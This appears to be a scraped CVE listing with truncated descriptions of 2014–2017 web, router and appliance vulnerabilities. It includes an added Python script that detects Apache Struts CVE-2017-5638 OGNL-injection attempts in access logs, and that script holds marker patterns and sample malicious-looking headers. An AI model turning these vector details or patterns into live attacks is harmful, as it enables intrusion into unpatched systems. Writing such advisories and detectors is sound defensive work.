The Participants Database plugin before 1.7.5.10 for WordPress has XSS.
04-09-2017 - 16:29 04-09-2017 - 16:29
CVE-2014-8677 3.5
The installation process for SOPlanning 1.32 and earlier allows remote authenticated users with a prepared database, and access to an existing database with a crafted name, or permissions to create arbitrary databases, or if PHP before 5.2 is being u
31-08-2017 - 18:29 31-08-2017 - 18:29
CVE-2014-8676 5.0
Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
31-08-2017 - 18:29 31-08-2017 - 18:29
CVE-2014-8675 5.0
Soplanning 1.32 and earlier generates static links for sharing ICAL calendars with embedded login information, which allows remote attackers to obtain a calendar owner's password via a brute-force attack on the embedded password hash.
31-08-2017 - 18:29 31-08-2017 - 18:29
CVE-2017-9979 4.3
On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, if the REST call invoked does not exist, an error will be triggered containing the invalid method previously invoked. The response sent to the user isn't sanitized in this case. An attacker
28-08-2017 - 15:29 28-08-2017 - 15:29
CVE-2017-9978 5.0
On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, a flaw was found with the error message sent as a response for users that don't exist on the system. An attacker could leverage this information to fine-tune and enumerate valid accounts on
28-08-2017 - 15:29 28-08-2017 - 15:29
CVE-2017-9650 4.6
An Unrestricted Upload of File with Dangerous Type issue was discovered in Automated Logic Corporation (ALC) ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior; ALC WebCTRL, SiteScan Web 6.1 and prior; ALC WebCTRL, i-Vu 6.0 and prior; ALC WebCTRL, i-Vu, S
25-08-2017 - 15:29 25-08-2017 - 15:29
CVE-2015-8352 10.0
Directory traversal vulnerability in Zen Cart 1.5.4 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the act parameter to ajax.php.
24-08-2017 - 17:29 24-08-2017 - 17:29
CVE-2015-7259 9.0
ZTE ADSL ZXV10 W300 modems W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57 allow user accounts to have multiple valid username and password pairs, which allows remote authenticated users to login to a target account via any of its username and pass
24-08-2017 - 16:29 24-08-2017 - 16:29
CVE-2015-7258 9.0
ZTE ADSL ZXV10 W300 modems W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57 allow remote authenticated users to obtain user passwords by displaying user information in a Telnet connection.
24-08-2017 - 16:29 24-08-2017 - 16:29
CVE-2015-7257 8.5
ZTE ADSL ZXV10 W300 modems W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57 allow remote authenticated non-administrator users to change the admin password by intercepting an outgoing password change request, and changing the username parameter from
24-08-2017 - 16:29 24-08-2017 - 16:29
CVE-2017-12984 4.3
PHPMyWind 5.3 has XSS in shoppingcart.php, related to message.php, admin/message.php, and admin/message_update.php.
21-08-2017 - 03:29 21-08-2017 - 03:29
CVE-2015-4071 5.0
The Helpdesk Pro Plugin before 1.4.0 for Joomla! allows remote attackers to read the support tickets of arbitrary users via obtaining the target ticketId, and navigating to http://{target}/component/helpdeskpro/?view=ticket&id={ticketId}.
18-08-2017 - 14:29 18-08-2017 - 14:29
CVE-2017-9767 3.5
Multiple cross-site scripting (XSS) vulnerabilities in Quali CloudShell before 8 allow remote authenticated users to inject arbitrary web script or HTML via the (1) Name or (2) Description parameter to RM/Reservation/ReserveNew; the (3) Description p
18-08-2017 - 12:29 18-08-2017 - 12:29
CVE-2017-12943 5.0
D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password.
18-08-2017 - 11:29 18-08-2017 - 11:29
CVE-2017-6327 6.5
Symantec Messaging Gateway before 10.6.3-267 is affected by a remote code execution issue, whereby an individual may obtain the ability to execute commands remotely on a target machine or in a target process. In thi
11-08-2017 - 16:29 11-08-2017 - 16:29
CVE-2014-5144 3.5
Cross-site scripting (XSS) vulnerability in Telescope before 0.9.3 allows remote authenticated users to inject arbitrary web script or HTML via crafted markdown.
09-08-2017 - 14:29 09-08-2017 - 14:29
CVE-2017-11155 5.0
An information exposure vulnerability in index.php in Synology Photo Station before 6.7.3-3432 and 6.3-2967 allows remote attackers to obtain sensitive system information via unspecified vectors.
08-08-2017 - 11:29 08-08-2017 - 11:29
CVE-2017-11154 6.5
Unrestricted file upload vulnerability in PixlrEditorHandler.php in Synology Photo Station before 6.7.3-3432 and 6.3-2967 allows remote attackers to create arbitrary PHP scripts via the type parameter.
08-08-2017 - 11:29 08-08-2017 - 11:29
CVE-2017-11153 7.5
Deserialization vulnerability in synophoto_csPhotoMisc.php in Synology Photo Station before 6.7.3-3432 and 6.3-2967 allows remote attackers to gain administrator privileges via a crafted serialized payload.
08-08-2017 - 11:29 08-08-2017 - 11:29
CVE-2017-11152 5.0
Directory traversal vulnerability in PixlrEditorHandler.php in Synology Photo Station before 6.7.3-3432 and 6.3-2967 allows remote attackers to write arbitrary files via the path parameter.
08-08-2017 - 11:29 08-08-2017 - 11:29
CVE-2017-11151 7.5
A vulnerability in synotheme_upload.php in Synology Photo Station before 6.7.3-3432 and 6.3-2967 allows remote attackers to upload arbitrary files without authentication via the logo_upload action.
08-08-2017 - 11:29 08-08-2017 - 11:29
CVE-2017-10046 4.9
Vulnerability in the Primavera P6 Enterprise Project Portfolio Management component of Oracle Primavera Products Suite (subcomponent: Web Access). Supported versions that are affected are 8.3, 8.4, 15.1, 15.2 and 16.1. Easily exploitable vulnerabilit
08-08-2017 - 11:29 08-08-2017 - 11:29
CVE-2015-7571 6.8
Unrestricted file upload vulnerability in Yeager CMS 1.2.1 allows remote attackers to execute arbitrary code by uploading a file with an executable extension.
07-08-2017 - 16:29 07-08-2017 - 16:29
CVE-2014-9262 5.5
The Duplicator plugin in WordPress before 0.5.10 allows remote authenticated users to create and download backup files.
07-08-2017 - 13:29 07-08-2017 - 13:29
CVE-2017-11394 10.0
Proxy command injection vulnerability in Trend Micro OfficeScan 11 and XG (12) allows remote attackers to execute arbitrary code on vulnerable installations. The specific flaw can be exploited by parsing the T parameter within Proxy.php. Formerly ZDI
03-08-2017 - 11:29 03-08-2017 - 11:29
CVE-2017-11320 4.3
Persistent XSS through the SSID of nearby Wi-Fi devices on Technicolor TC7337 routers 08.89.17.20.00 allows an attacker to cause DNS Poisoning and steal credentials from the router.
03-08-2017 - 04:29 03-08-2017 - 04:29
CVE-2017-11356 4.0
The application distribution export functionality in PEGA Platform 7.2 ML0 and earlier allows remote authenticated users with certain privileges to obtain sensitive configuration information by leveraging a missing access control.
02-08-2017 - 15:29 02-08-2017 - 15:29
CVE-2017-11355 4.3
Multiple cross-site scripting (XSS) vulnerabilities in PEGA Platform 7.2 ML0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO to the main page; the (2) beanReference parameter to the JavaBean viewer page
02-08-2017 - 15:29 02-08-2017 - 15:29
CVE-2017-11494 7.5
SQL injection vulnerability in SOL.Connect ISET-mpp meter 1.2.4.2 and earlier allows remote attackers to execute arbitrary SQL commands via the user parameter in a login action.
02-08-2017 - 10:29 02-08-2017 - 10:29
CVE-2016-0736 5.0
In Apache HTTP Server versions 2.4.0 to 2.4.23, mod_session_crypto was encrypting its data/cookie using the configured ciphers with possibly either CBC or ECB modes of operation (AES256-CBC by default), hence no selectable or builtin authenticated en
27-07-2017 - 17:29 27-07-2017 - 17:29
CVE-2017-9413 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in the Podcast feature in Subsonic 6.1.1 allow remote attackers to hijack the authentication of users for requests that (1) subscribe to a podcast via the add parameter to podcastReceiverAdmi
25-07-2017 - 14:29 25-07-2017 - 14:29
CVE-2015-2798 7.5
SQL injection vulnerability in Joomla! Component Contact Form Maker 1.0.1 allows remote attackers to execute arbitrary SQL commands via the id parameter.
25-07-2017 - 14:29 25-07-2017 - 14:29
CVE-2015-2280 9.0
snwrite.cgi in AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP network camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the mac parameter.
24-07-2017 - 21:29 24-07-2017 - 21:29
CVE-2015-2279 10.0
cgi_test.cgi in AirLive BU-2015 with firmware 1.03.18, BU-3026 with firmware 1.43, and MD-3025 with firmware 1.81 allows remote attackers to execute arbitrary OS commands via shell metacharacters after an "&" (ampersand) in the write_mac write_pid, w
24-07-2017 - 21:29 24-07-2017 - 21:29
CVE-2017-9554 5.0
An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors.
24-07-2017 - 16:29 24-07-2017 - 16:29
CVE-2017-9415 5.1
Cross-site request forgery (CSRF) vulnerability in Subsonic 6.1.1 allows remote attackers with knowledge of the target username to hijack the authentication of users for requests that change passwords via a crafted request to userSettings.view.
21-07-2017 - 10:29 21-07-2017 - 10:29
CVE-2017-7037 6.8
An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue inv
20-07-2017 - 12:29 20-07-2017 - 12:29
CVE-2017-6316 10.0
Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote attackers to execute arbitrary shell commands as root via a CGISESSID cookie. On CloudBridge (the former name of NetScaler SD-WAN) devices, the cookie name was CAKEPHP rather than
20-07-2017 - 00:29 20-07-2017 - 00:29
CVE-2017-6320 9.0
A remote command injection vulnerability exists in the Barracuda Load Balancer product line (confirmed on v5.4.0.004 (2015-11-26) and v6.0.1.006 (2016-08-19); fixed in 6.1.0.003 (2017-01-17)) in which an authenticated user can execute arbitrary shell
18-07-2017 - 10:29 18-07-2017 - 10:29
CVE-2017-9813 4.3
In Kaspersky Anti-Virus for Linux File Server before Maintenance Pack 2 Critical Fix 4 (version 8.0.4.312), the scriptName parameter of the licenseKeyInfo action method is vulnerable to cross-site scripting (XSS).
17-07-2017 - 17:29 17-07-2017 - 17:29
CVE-2017-9812 5.0
The reportId parameter of the getReportStatus action method can be abused in the web interface in Kaspersky Anti-Virus for Linux File Server before Maintenance Pack 2 Critical Fix 4 (version 8.0.4.312) to read arbitrary files with kluser privileges.
17-07-2017 - 17:29 17-07-2017 - 17:29
CVE-2017-9811 10.0
The kluser is able to interact with the kav4fs-control binary in Kaspersky Anti-Virus for Linux File Server before Maintenance Pack 2 Critical Fix 4 (version 8.0.4.312). By abusing the quarantine read and write operations, it is possible to elevate t
17-07-2017 - 17:29 17-07-2017 - 17:29
CVE-2017-9810 6.8
There are no Anti-CSRF tokens in any forms on the web interface in Kaspersky Anti-Virus for Linux File Server before Maintenance Pack 2 Critical Fix 4 (version 8.0.4.312). This would allow an attacker to submit authenticated requests when an authenti
17-07-2017 - 17:29 17-07-2017 - 17:29
CVE-2017-11346 7.5
Zoho ManageEngine Desktop Central before build 100092 allows remote attackers to execute arbitrary code via vectors involving the upload of help desk videos.
17-07-2017 - 09:18 17-07-2017 - 09:18
CVE-2017-1000028 5.0
Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to directory traversal, both authenticated and unauthenticated, which can be exploited by issuing a specially crafted HTTP GET request.
17-07-2017 - 09:18 17-07-2017 - 09:18
CVE-2017-7175 9.0
NfSen before 1.3.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the customfmt parameter (aka the "Custom output format" field).
10-07-2017 - 15:29 10-07-2017 - 15:29
CVE-2017-9791 7.5
The Struts 1 plugin in Apache Struts 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.
10-07-2017 - 12:29 10-07-2017 - 12:29
CVE-2017-10682 7.5
SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter in the comments or status page to cat_options.php.
29-06-2017 - 17:29 29-06-2017 - 17:29
CVE-2017-6086 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in the addAction and purgeAction functions in ViMbAdmin 3.0.15 allow remote attackers to hijack the authentication of logged administrators to (1) add an administrator user via a crafted POST
27-06-2017 - 16:29 27-06-2017 - 16:29
CVE-2017-9833 5.0
/cgi-bin/wapopen in BOA Webserver 0.94.14rc21 allows the injection of "../.." using the FILECAMERA variable (sent by GET) to read files with root privileges.
23-06-2017 - 22:29 23-06-2017 - 22:29
CVE-2015-9098 10.0
In Redgate SQL Monitor before 3.10 and 4.x before 4.2, a remote attacker can gain unauthenticated access to the Base Monitor, resulting in the ability to execute arbitrary SQL commands on any monitored Microsoft SQL Server machines. If the Base Monit
22-06-2017 - 15:29 22-06-2017 - 15:29
CVE-2016-7508 6.0
Multiple SQL injection vulnerabilities in GLPI 0.90.4 allow an authenticated remote attacker to execute arbitrary SQL commands by using a certain character when the database is configured to use Big5 Asian encoding.
21-06-2017 - 16:29 21-06-2017 - 16:29
CVE-2017-9730 7.5
SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier allows remote attackers to execute arbitrary SQL commands via the "r" parameter.
19-06-2017 - 08:29 19-06-2017 - 08:29
CVE-2017-9602 7.5
KBVault Mysql Free Knowledge Base application package 0.16a comes with a FileExplorer/Explorer.aspx?id=/Uploads file-management component. An unauthenticated user can access the file upload and deletion functionality. Through this functionality, a us
16-06-2017 - 09:29 16-06-2017 - 09:29
CVE-2017-9603 6.5
SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress allows authenticated users to execute arbitrary SQL commands via the jobid parameter to wp-admin/edit.php.
13-06-2017 - 14:29 13-06-2017 - 14:29
CVE-2017-9429 6.5
SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress allows an authenticated user to execute arbitrary SQL commands via the id parameter to wp-admin/admin.php.
13-06-2017 - 14:29 13-06-2017 - 14:29
CVE-2017-9418 6.5
SQL injection vulnerability in the WP-Testimonials plugin 3.4.1 for WordPress allows an authenticated user to execute arbitrary SQL commands via the testid parameter to wp-admin/admin.php.
12-06-2017 - 09:29 12-06-2017 - 09:29
CVE-2014-8687 10.0
Seagate Business NAS devices with firmware before 2015.00322 allow remote attackers to execute arbitrary code with root privileges by leveraging use of a static encryption key to create session tokens.
08-06-2017 - 12:29 08-06-2017 - 12:29
CVE-2017-9516 3.5
Craft CMS before 2.6.2982 allows for a potential XSS attack vector by uploading a malicious SVG file.
08-06-2017 - 09:29 08-06-2017 - 09:29
CVE-2015-7346 7.5
SQL injection vulnerability in ZCMS 1.1.
07-06-2017 - 17:29 07-06-2017 - 17:29
CVE-2017-8841 7.5
Arbitrary file deletion exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The attack methodology is absolute path traversal in cgi-bin/MANGA/firmwar
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2017-8840 5.0
Debug information disclosure exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. A direct request to cgi-bin/HASync/hasync.cgi?debug=1 shows Master LA
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2017-8839 4.3
XSS via orig_url exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The affected script is guest/preview.cgi.
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2017-8838 4.3
XSS via syncid exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The affected script is cgi-bin/HASync/hasync.cgi.
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2017-8837 5.0
Cleartext password storage exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The files in question are /etc/waipass and /etc/roapass. In case one of
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2017-8836 6.8
CSRF exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The CGI scripts in the administrative interface are affected. This allows an attacker to exec
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2017-8835 7.5
SQL injection exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. An attack vector is the bauth cookie to cgi-bin/MANGA/admin.cgi. One impact is enume
05-06-2017 - 10:29 05-06-2017 - 10:29
CVE-2016-6256 6.8
SAP Business One for Android 1.2.3 allows remote attackers to conduct XML External Entity (XXE) attacks via crafted XML data in a request to B1iXcellerator/exec/soap/vP.001sap0003.in_WCSX/com.sap.b1i.vplatform.runtime/INB_WS_CALL_SYNC_XPT/INB_WS_CALL
25-05-2017 - 21:29 25-05-2017 - 21:29
CVE-2017-1092 10.0
IBM Informix Open Admin Tool 11.5, 11.7, and 12.1 could allow an unauthorized user to execute arbitrary code as system admin on Windows servers. IBM X-Force ID: 120390.
22-05-2017 - 16:29 22-05-2017 - 16:29
CVE-2017-2528 4.3
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site t
22-05-2017 - 01:29 22-05-2017 - 01:29
CVE-2017-2515 6.8
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cau
22-05-2017 - 01:29 22-05-2017 - 01:29
CVE-2017-2510 4.3
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site t
22-05-2017 - 01:29 22-05-2017 - 01:29
CVE-2017-2508 4.3
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site t
22-05-2017 - 01:29 22-05-2017 - 01:29
CVE-2017-2504 4.3
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS)
22-05-2017 - 01:29 22-05-2017 - 01:29
CVE-2017-9101 7.5
import.php (aka the Phonebook import feature) in PlaySMS 1.4 allows remote code execution via vectors involving the User-Agent HTTP header and PHP code in the name of a file.
21-05-2017 - 14:29 21-05-2017 - 14:29
CVE-2017-7620 4.3
MantisBT before 1.3.11, 2.x before 2.3.3, and 2.4.x before 2.4.1 omits a backslash check in string_api.php and consequently has conflicting interpretations of an initial \/ substring as introducing either a local pathname or a remote hostname, which
21-05-2017 - 10:29 21-05-2017 - 10:29
CVE-2017-9100 8.3
login.cgi on D-Link DIR-600M devices with firmware 3.04 allows remote attackers to bypass authentication by entering more than 20 blank spaces in the password field during an admin login attempt.
21-05-2017 - 00:29 21-05-2017 - 00:29
CVE-2017-5174 7.5
An Authentication Bypass issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An authentication bypass vulnerability has been identified. The existing file system architecture could allow attackers to bypass the access contr
18-05-2017 - 23:29 18-05-2017 - 23:29
CVE-2017-5173 10.0
An Improper Neutralization of Special Elements (in an OS command) issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An improper neutralization of special elements vulnerability has been identified. If special elements are
18-05-2017 - 23:29 18-05-2017 - 23:29
CVE-2017-9072 4.3
Two CalendarXP products have XSS in common parts of HTML files. CalendarXP FlatCalendarXP through 9.9.290 has XSS in iflateng.htm and nflateng.htm. CalendarXP PopCalendarXP through 9.8.308 has XSS in ipopeng.htm and npopeng.htm.
18-05-2017 - 13:29 18-05-2017 - 13:29
CVE-2017-8917 7.5
SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.
17-05-2017 - 19:29 17-05-2017 - 19:29
CVE-2017-8382 3.5
Admidio 3.2.8 has CSRF in adm_program/modules/members/members_function.php with an impact of deleting arbitrary user accounts.
16-05-2017 - 06:29 16-05-2017 - 06:29
CVE-2017-7953 3.5
INFOR EAM V11.0 Build 201410 has XSS via comment fields.
16-05-2017 - 06:29 16-05-2017 - 06:29
CVE-2017-7952 6.5
INFOR EAM V11.0 Build 201410 has SQL injection via search fields, related to the filtervalue parameter.
16-05-2017 - 06:29 16-05-2017 - 06:29
CVE-2017-8928 6.8
mailcow 0.14, as used in "mailcow: dockerized" and other products, has CSRF.
14-05-2017 - 18:29 14-05-2017 - 18:29
CVE-2017-8912 6.5
** DISPUTED ** CMS Made Simple (CMSMS) 2.1.6 allows remote authenticated administrators to execute arbitrary PHP code via the code parameter to admin/editusertag.php, related to the CreateTagFunction and CallUserTag functions. NOTE: the vendor report
12-05-2017 - 03:29 12-05-2017 - 03:29
CVE-2017-7981 9.0
Tuleap before 9.7 allows command injection via the PhpWiki 1.3.10 SyntaxHighlighter plugin. This occurs in the Project Wiki component because the proc_open PHP function is used within PhpWiki before 1.5.5 with a syntax value in its first argument, an
11-05-2017 - 10:22 29-04-2017 - 12:59
CVE-2017-5638 10.0
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a
09-05-2017 - 21:29 10-03-2017 - 21:59
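The CVE-2017-5638 vector is an OGNL expression carried in the Content-Type header of a request that reaches the Jakarta multipart parser, so a detection that looks for expression markers in that header catches it regardless of payload. Below is an added detection example, not Apache Struts code. The log format is an assumption (an httpd-style access log extended with the request's Content-Type in a final quoted field, as one would configure with a custom LogFormat); the sample lines are constructed.

```python
import re

# Assumed log format: ip ident user [timestamp] "METHOD path proto" status size "content-type"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<content_type>[^"]*)"$'
)

# Markers that never occur in a legitimate media type but are needed either to
# open an OGNL expression or to reach Struts' ValueStack internals.
OGNL_MARKERS = re.compile(r"%\{|\$\{|#_memberAccess|@ognl\.|#context\[", re.IGNORECASE)


def content_type_is_suspicious(content_type: str) -> bool:
    """True when the Content-Type value contains an OGNL expression marker."""
    return bool(OGNL_MARKERS.search(content_type))


def scan_access_log(lines):
    """Return (ip, path, content_type) for each request carrying an OGNL marker."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.rstrip("\n"))
        if not m:
            continue  # not in the assumed format; skip rather than guess
        if content_type_is_suspicious(m["content_type"]):
            hits.append((m["ip"], m["path"], m["content_type"]))
    return hits


# Constructed sample log: one genuine multipart upload, one GET without a body,
# and two requests whose Content-Type opens an OGNL expression.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2017:09:12:01 +0000] "POST /app/upload.action HTTP/1.1" '
    '200 1532 "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk"',
    '198.51.100.23 - - [10/Mar/2017:09:12:44 +0000] "POST /app/upload.action HTTP/1.1" '
    '200 1532 "%{(#_=\'multipart/form-data\').(#demo=\'constructed\')}"',
    '192.0.2.5 - - [10/Mar/2017:09:13:10 +0000] "GET /app/index.action HTTP/1.1" 200 4096 "-"',
    '198.51.100.23 - - [10/Mar/2017:09:14:02 +0000] "POST /app/upload.action HTTP/1.1" '
    '500 211 "${#_memberAccess}"',
]

if __name__ == "__main__":
    for ip, path, ctype in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {path} -> {ctype}")
```

Because the header is read before the multipart body is parsed, a vulnerable server can be hit by a request with no body at all; matching on the header rather than on upload activity is therefore the right place to look. Apply the same marker check to Content-Disposition and Content-Length values if the log captures them, since later Struts fixes covered those headers too.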
CVE-2016-2183 5.0
The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birth
09-05-2017 - 21:29 31-08-2016 - 20:59
CVE-2017-8295 4.3
WordPress through 4.7.4 relies on the Host HTTP header for a password-reset e-mail message, which makes it easier for remote attackers to reset arbitrary passwords by making a crafted wp-login.php?action=lostpassword request and then arranging for th
05-05-2017 - 21:29 04-05-2017 - 10:29
CVE-2017-7221 6.5
OpenText Documentum Content Server has an inadequate protection mechanism against SQL injection, which allows remote authenticated users to execute arbitrary code with super-user privileges by leveraging the availability of the dm_bp_transition docba
05-05-2017 - 20:09 25-04-2017 - 10:59
CVE-2017-3549 7.5
Vulnerability in the Oracle Scripting component of Oracle E-Business Suite (subcomponent: Scripting Administration). Supported versions that are affected are 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily "exploitable" vulnerabilit
04-05-2017 - 14:01 24-04-2017 - 15:59
CVE-2017-3528 5.8
Vulnerability in the Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily "exp
04-05-2017 - 11:55 24-04-2017 - 15:59
CVE-2017-3548 6.4
Vulnerability in the PeopleSoft Enterprise PeopleTools component of Oracle PeopleSoft Products (subcomponent: Integration Broker). Supported versions that are affected are 8.54 and 8.55. Easily "exploitable" vulnerability allows unauthenticated attac
04-05-2017 - 11:54 24-04-2017 - 15:59
CVE-2017-3546 6.4
Vulnerability in the PeopleSoft Enterprise PeopleTools component of Oracle PeopleSoft Products (subcomponent: MultiChannel Framework). Supported versions that are affected are 8.54 and 8.55. Easily "exploitable" vulnerability allows unauthenticated a
04-05-2017 - 11:54 24-04-2017 - 15:59
CVE-2016-5063 5.0
The RSCD agent in BMC Server Automation before 8.6 SP1 Patch 2 and 8.7 before Patch 3 on Windows might allow remote attackers to bypass authorization checks and make an RPC call via unspecified vectors.
02-05-2017 - 10:59 02-05-2017 - 10:59
CVE-2015-8257 9.0
The devtools.sh script in AXIS network cameras allows remote authenticated users to execute arbitrary commands via shell metacharacters in the app parameter to (1) app_license.shtml, (2) app_license_custom.shtml, (3) app_index.shtml, or (4) app_param
02-05-2017 - 10:59 02-05-2017 - 10:59
CVE-2016-4313 6.8
Directory traversal vulnerability in unzip/extract feature in eXtplorer 2.1.9 allows remote attackers to execute arbitrary files via a .. (dot dot) in an archive file.
01-05-2017 - 21:59 24-04-2017 - 14:59
CVE-2017-5631 4.3
An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string.
01-05-2017 - 10:59 01-05-2017 - 10:59
CVE-2014-7235 10.0
htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x, and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth cookie, related to the PHP uns
28-04-2017 - 21:59 07-10-2014 - 10:55
CVE-2015-7247 7.8
D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 discloses usernames, passwords, keys, values, and web account hashes (super and admin) in plaintext when running a configuration backup, which allows remote attackers to obtain se
28-04-2017 - 14:49 24-04-2017 - 14:59
CVE-2015-7246 10.0
D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 has a default password of root for the root account and tw for the tw account, which makes it easier for remote attackers to obtain administrative access.
28-04-2017 - 14:33 24-04-2017 - 14:59
CVE-2015-7245 5.0
Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
28-04-2017 - 13:47 24-04-2017 - 14:59
CVE-2015-7568 7.5
SQL injection vulnerability in the password recovery feature in Yeager CMS 1.2.1 allows remote attackers to change the account credentials of known users via the "userEmail" parameter.
28-04-2017 - 12:26 24-04-2017 - 14:59
CVE-2015-7569 7.5
SQL injection vulnerability in "yeager/y.php/tab_USERLIST" in Yeager CMS 1.2.1 allows local users to execute arbitrary SQL commands via the "pagedir_orderby" parameter.
27-04-2017 - 15:15 24-04-2017 - 14:59
CVE-2015-7570 6.4
Multiple server-side request forgery (SSRF) vulnerabilities in Yeager CMS 1.2.1 allow remote attackers to trigger outbound requests and enumerate open ports via the dbhost parameter to libs/org/adodb_lite/tests/test_adodb_lite.php, libs/org/adodb_lit
27-04-2017 - 13:45 24-04-2017 - 14:59
CVE-2016-1713 8.5
Unrestricted file upload vulnerability in the Settings_Vtiger_CompanyDetailsSave_Action class in modules/Settings/Vtiger/actions/CompanyDetailsSave.php in Vtiger CRM 6.4.0 allows remote authenticated users to execute arbitrary code by uploading a cra
25-04-2017 - 11:52 14-04-2017 - 14:59
CVE-2015-8256 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras.
24-04-2017 - 20:40 17-04-2017 - 12:59
CVE-2015-7572
** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2013-0237. Reason: This candidate is a duplicate of CVE-2013-0237. Notes: All CVE users should reference CVE-2013-0237 instead of this candidate. All references and descriptions in this
24-04-2017 - 14:59 24-04-2017 - 14:59
CVE-2016-5312 4.0
